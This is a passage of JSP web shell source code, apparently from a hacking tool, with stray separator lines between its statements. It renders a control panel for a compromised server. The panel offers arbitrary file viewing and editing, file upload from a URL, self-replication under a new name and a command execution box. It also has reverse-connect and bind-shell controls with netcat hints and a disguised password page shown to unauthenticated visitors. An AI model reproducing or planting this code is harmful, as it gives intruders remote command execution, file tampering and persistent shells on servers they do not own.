else pesan = "Failed to save file";
|
||
|
mymsg = "<span style=\"float:right;\"><span class=\"gaul\">[ </span>" + pesan + "<span class=\"gaul\"> ]</span></span>";
|
||
|
}
|
||
|
if((request.getParameter("view")!=null) && (!request.getParameter("view").equals(""))) {
|
||
|
fpath = request.getParameter("view");
|
||
|
if((request.getParameter("saveas")!=null) && (!request.getParameter("saveas").equals(""))){
|
||
|
fpath = request.getParameter("saveas");
|
||
|
}
|
||
|
}
|
||
|
else fpath = xCwd + request.getParameter("filename");
|
||
|
|
||
|
StringBuffer result_ = new StringBuffer("");;
|
||
|
BufferedReader reader = new BufferedReader(new FileReader(fpath));
|
||
|
int i;
|
||
|
|
||
|
boolean cr = false;
|
||
|
while ((i = reader.read()) >= 0) {
|
||
|
result_.append((char) i);
|
||
|
if (i == '\r') cr = true;
|
||
|
else if (cr && (i == '\n')) dos = true;
|
||
|
else cr = false;
|
||
|
}
|
||
|
reader.close();
|
||
|
String doz = "";if(dos) doz="true";else doz="false";
|
||
|
result = "<p style=\"padding:0;margin:0;text-align:left;\"><a href=\"?dir=" + xCwd + "&properties=" + fpath + "\">" + xfilesummary(fpath) + "</a>" + mymsg + "</p><div style=\"clear:both;margin:0;padding:0;\"></div>" +
|
||
|
"<form action=\"?dir=" + xCwd + "&view=" + fpath + "\" method=\"post\">" +
|
||
|
"<textarea name=\"filesource\" style=\"width:100%;height:200px;\">" + result_ + "</textarea>" +
|
||
|
"<input type=\"text\" style=\"width:80%;\" name=\"saveas\" value=\"" + fpath + "\" />" +
|
||
|
"<input type=\"hidden\" style=\"width:80%;\" name=\"dos\" value=\"" + doz + "\" />" +
|
||
|
" <input type=\"submit\" class=\"btn\" style=\"width:120px;\" name=\"save\" value=\"Save As\" />" +
|
||
|
"</form>";
|
||
|
}
|
||
|
else{
|
||
|
result = xdir(xCwd);
|
||
|
}
|
||
|
//################# Finalizing #######################======================================================]
|
||
|
File xcfile = new File(".");
|
||
|
xCwd = xcfile.getCanonicalPath();
|
||
|
String html_title = "";
|
||
|
String html_head = "";
|
||
|
String html_body = "";
|
||
|
if(auth){
|
||
|
String bportC = "";
|
||
|
String lportC = "";
|
||
|
if(request.getParameter("bportC")!=null) bportC = request.getParameter("bportC");
|
||
|
else bportC = shell_fav_port;
|
||
|
if(request.getParameter("lportC")!=null) lportC = request.getParameter("lportC");
|
||
|
else lportC = shell_fav_port;
|
||
|
|
||
|
html_title = shell_title + " " + xCwd;
|
||
|
html_head = "<title>" + html_title + "</title>" +
|
||
|
"<link rel=\"SHORTCUT ICON\" href=\"" + script_name + "?img=icon\" />" + shell_style +
|
||
|
"<script type=\"text/javascript\">" +
|
||
|
"function updateInfo(boxid,typ){" +
|
||
|
" if(typ == 0){" +
|
||
|
" var pola = 'example: (using netcat) run "nc -l -p __PORT__" and then press Connect'; " +
|
||
|
" }" +
|
||
|
" else{" +
|
||
|
" var pola = 'example: (using netcat) press "Listen" and then run "nc " + xServerIP + " __PORT__"'; " +
|
||
|
" }" +
|
||
|
" var portnum = document.getElementById(boxid).value;" +
|
||
|
" var hasil = pola.replace('__PORT__', portnum);" +
|
||
|
" document.getElementById(boxid+'_').innerHTML = hasil;" +
|
||
|
"}" +
|
||
|
"function show(boxid){" +
|
||
|
" var box = document.getElementById(boxid);" +
|
||
|
" if(box.style.display != 'inline'){" +
|
||
|
" document.getElementById('newfile').style.display = 'none';" +
|
||
|
" document.getElementById('newfolder').style.display = 'none';" +
|
||
|
" document.getElementById('newupload').style.display = 'none';" +
|
||
|
" document.getElementById('newchild').style.display = 'none';" +
|
||
|
" document.getElementById('newconnect').style.display = 'none';" +
|
||
|
" box.style.display = 'inline';" +
|
||
|
" box.focus();" +
|
||
|
" }" +
|
||
|
" else box.style.display = 'none';" +
|
||
|
"}" +
|
||
|
"function highlighthexdump(address){" +
|
||
|
" var target = document.getElementById(address);" +
|
||
|
" target.style.background = '" + shell_color + "';" +
|
||
|
"}" +
|
||
|
"function unhighlighthexdump(address){" +
|
||
|
" var target = document.getElementById(address);" +
|
||
|
" target.style.background = 'none';" +
|
||
|
"}" +
|
||
|
"</script>";
|
||
|
html_body = "<div id=\"wrapper\">" +
|
||
|
"<h1 onmouseover=\"this.style.cursor='pointer';this.style.cursor='hand';\" onclick=\"window.location= '?';\"><a href=\"?\">" + shell_title + "</a></h1>" +
|
||
|
"<div class=\"box\">" + xHeader +
|
||
|
"<div class=\"fpath\">" + xdrive() + xparsedir(xCwd) +
|
||
|
"</div>" +
|
||
|
"<div class=\"menu\">" +
|
||
|
"<a href=\"javascript:show('newfile');\"><span class=\"gaul\">[ </span> New File<span class=\"gaul\"> ]</span></a> " +
|
||
|
"<a href=\"javascript:show('newfolder');\"><span class=\"gaul\">[ </span>New Folder<span class=\"gaul\"> ]</span></a> " +
|
||
|
"<a href=\"javascript:show('newchild');\"><span class=\"gaul\">[ </span>Replicate<span class=\"gaul\"> ]</span></a> " +
|
||
|
"<a href=\"javascript:show('newupload');\"><span class=\"gaul\">[ </span>Upload<span class=\"gaul\"> ]</span></a> " +
|
||
|
"<a href=\"javascript:show('newconnect');\"><span class=\"gaul\">[ </span>BindShell<span class=\"gaul\"> ]</span></a> " +
|
||
|
"</div>" +
|
||
|
"<div class=\"hidden\" id=\"newconnect\">" +
|
||
|
"<form method=\"get\" action=\"?\" style=\"display:inline;margin:0;padding:0;\">" +
|
||
|
"<table class=\"tblBox\" style=\"width:100%;\">" +
|
||
|
"<input type=\"hidden\" name=\"dir\" value=\"" + xCwd + "\" />" +
|
||
|
"<tr><td style=\"width:130px;\">BackConnect</td><td style=\"width:200px;\">" +
|
||
|
"Port <input maxlength=\"5\" id=\"backC\" onkeyup=\"updateInfo('backC',0);\" style=\"width:60px;\" type=\"text\" name=\"bportC\" value=\"" + bportC + "\" />" +
|
||
|
" <input style=\"width:100px;\" type=\"submit\" class=\"btn\" name=\"btnConnect\" value=\"Connect\" />" +
|
||
|
"</td>" +
|
||
|
"<td><span id=\"backC_\" class=\"msgcon\">example: (using netcat) run "nc -l -p " + bportC + "" and then press Connect</span></td>" +
|
||
|
"</tr>" +
|
||
|
"<tr><td>Listen</td><td>" +
|
||
|
"Port <input maxlength=\"5\" id=\"listenC\" onkeyup=\"updateInfo('listenC',1);\" style=\"width:60px;\" type=\"text\" name=\"lportC\" value=\"" + lportC + "\" />" +
|
||
|
" <input style=\"width:100px;\" type=\"submit\" class=\"btn\" name=\"btnListen\" value=\"Listen\" />" +
|
||
|
"</td>" +
|
||
|
"<td><span id=\"listenC_\" class=\"msgcon\">example: (using netcat) press "Listen" and then run "nc " + xServerIP + " " + lportC + ""</span></td>" +
|
||
|
"</tr></table></form></div>" +
|
||
|
"<div class=\"hidden\" id=\"newfolder\">" +
|
||
|
"<form method=\"get\" action=\"?\" style=\"display:inline;margin:0;padding:0;\">" +
|
||
|
"<input type=\"hidden\" name=\"dir\" value=\"" + xCwd + "\" />" +
|
||
|
"<table class=\"tblBox\" style=\"width:560px;\">" +
|
||
|
"<tr><td style=\"width:120px;\">New Foldername</td><td style=\"width:304px;\">" +
|
||
|
"<input style=\"width:300px;\" type=\"text\" name=\"foldername\" value=\"newfolder\" />" +
|
||
|
"</td><td>" +
|
||
|
"<input style=\"width:100px;\" type=\"submit\" class=\"btn\" name=\"btnNewfolder\" value=\"Create\" />" +
|
||
|
"</td></tr></table></form></div>" +
|
||
|
"<div class=\"hidden\" id=\"newfile\">" +
|
||
|
"<form action=\"?\" method=\"get\" style=\"display:inline;margin:0;padding:0;\">" +
|
||
|
"<input type=\"hidden\" name=\"dir\" value=\"" + xCwd + "\" />" +
|
||
|
"<table class=\"tblBox\" style=\"width:560px;\">" +
|
||
|
"<tr><td style=\"width:120px;\">New Filename</td><td style=\"width:304px;\">" +
|
||
|
"<input style=\"width:300px;\" type=\"text\" name=\"filename\" value=\"newfile\" />" +
|
||
|
"</td><td>" +
|
||
|
"<input style=\"width:100px;\" type=\"submit\" class=\"btn\" name=\"btnNewfile\" value=\"Create\" />" +
|
||
|
"</td></tr></form></table></div>" +
|
||
|
"<div class=\"hidden\" id=\"newupload\">" +
|
||
|
"<form method=\"post\" action=\"?dir=" + xCwd + "\" enctype=\"multipart/form-data\" style=\"display:inline;margin:0;padding:0;\">" +
|
||
|
"<table class=\"tblBox\" style=\"width:560px;\">" +
|
||
|
"<tr><td style=\"width:120px;\">Save as</td><td><input style=\"width:300px;\" type=\"text\" name=\"filename\" value=\"\" /></td></tr>" +
|
||
|
"<tr><td style=\"width:120px;\">From Url</td><td style=\"width:304px;\">" +
|
||
|
"<input style=\"width:300px;\" type=\"text\" name=\"fileurl\" value=\"\" />" +
|
||
|
"</td><td><input style=\"width:100px;\" type=\"submit\" class=\"btn\" name=\"btnNewUploadUrl\" value=\"Get\" /></td></tr>" +
|
||
|
"<tr><td style=\"width:120px;\">From Computer</td><td style=\"width:304px;\">" +
|
||
|
"<input style=\"width:300px;\" type=\"file\" name=\"filelocal\" />" +
|
||
|
"</td><td><input style=\"width:100px;\" type=\"submit\" class=\"btn\" name=\"btnNewUploadLocal\" value=\"Get\" />" +
|
||
|
"</td></tr></table></form></div>" +
|
||
|
"<div class=\"hidden\" id=\"newchild\">" +
|
||
|
"<form method=\"get\" action=\"?\" style=\"display:inline;margin:0;padding:0;\">" +
|
||
|
"<input type=\"hidden\" name=\"dir\" value=\"" + xCwd + "\" />" +
|
||
|
"<table class=\"tblBox\" style=\"width:560px;\">" +
|
||
|
"<tr><td style=\"width:120px;\">New Shellname</td><td style=\"width:304px;\">" +
|
||
|
"<input style=\"width:300px;\" type=\"text\" name=\"childname\" value=\"" + shell_name + ".jsp\"; />" +
|
||
|
"</td><td><input style=\"width:100px;\" type=\"submit\" class=\"btn\" name=\"btnNewchild\" value=\"Create\" />" +
|
||
|
"</td></tr></table></form></div>" +
|
||
|
"<div class=\"bottomwrapper\">" +
|
||
|
"<div class=\"cmdbox\">" +
|
||
|
"<form action=\"?\" method=\"get\">" +
|
||
|
"<input type=\"hidden\" name=\"dir\" value=\"" + xCwd + "\" />" +
|
||
|
"<table style=\"width:100%;\"><tr>" +
|
||
|
"<td style=\"width:88%;\"><input type=\"text\" id=\"cmd\" name=\"cmd\" value=\"\" style=\"width:100%;\" /></td>" +
|
||
|
"<td style=\"width:10%;\"><input type=\"submit\" class=\"btn\" name=\"btnCommand\" style=\"width:120px;\" value=\"Execute\" /></td></tr></table>" +
|
||
|
"</form>" +
|
||
|
"</div>" +
|
||
|
"<div class=\"result\" id=\"result\">" + result +
|
||
|
"</div></div></div></div>";
|
||
|
}
|
||
|
else {
|
||
|
html_title = shell_fake_name;
|
||
|
html_head = "<title>" + html_title + "</title>" + shell_style;
|
||
|
html_body = "<div style=\"margin:30px;\">" +
|
||
|
"<div>" +
|
||
|
"<form action=\"?\" method=\"post\">" +
|
||
|
"<input id=\"cmd\" type=\"text\" name=\"passw\" value=\"\" />" +
|
||
|
"<input type=\"submit\" name=\"btnpasswd\" value=\"Ok\" />" +
|
||
|
"</form>" +
|
||
|
"</div>" +
|
||
|
"<div style=\"font-size:10px;\">" + shell_fake_name + "</div>" +
|
||
|
"</div>";
|
||
|
}
|
||
|
String html_onload = "";
|
||
|
if((request.getParameter("cmd")!=null) || (request.getParameter("passw")!=null)){
|
||
|
html_onload = " onload=\"document.getElementById('cmd').focus();\"";
|
||
|
}
|
||
|
else html_onload = "";
|
||
|
|
||
|
String html_final = "<html><head>" + html_head +
|
||
|
"</head>" +
|
||
|
"<body" + html_onload + ">" +
|
||
|
"<div id=\"mainwrapper\">" + html_body +
|
||
|
"</div></body></html>";
|
||
|
%><% out.println(html_final.replace("\\s+"," ").trim()); %>
|